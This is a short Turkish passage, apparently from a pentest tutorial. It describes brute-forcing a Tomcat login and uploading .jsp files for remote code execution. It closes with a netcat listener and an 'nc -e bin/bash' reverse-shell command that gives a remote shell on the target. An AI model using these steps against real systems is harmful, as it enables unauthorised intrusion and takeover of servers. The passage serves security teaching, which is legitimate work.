Bu yüzden Tomcat servisine manuel kaba kuvvet saldırısı yapmak en mantıklısıdır. Tomcat servisine tarayıcı üzerinden erişilir. Herhangi bir yol ile Tomcat giriş bilgilerine eriştiğimiz bir sisteme .jsp uzantılı dosyalar yüklenebilir.
Bu dosyalar ile uzaktan kod yürütme işlemi gerçekleştirilebilir. Bu dosyalara Github’dan rahatlıkla erişim sağlayabilirsiniz.
Bir örnek vermek gerekirse Uzaktan Kod Yürütme ile kendimize bir Netcat Shell bağlantısı alabiliriz.
terminali açıp şu komutu gireriz:
nc -l -v -p 4444
Uzaktaki komut satırımıza da şu komutu veriyoruz
nc -e bin/bash “ip adresi” 4444Ve böylelikle hedefin komut satırında istediğimiz komutları çalıştırabiliriz.(www.sechunterz.pw)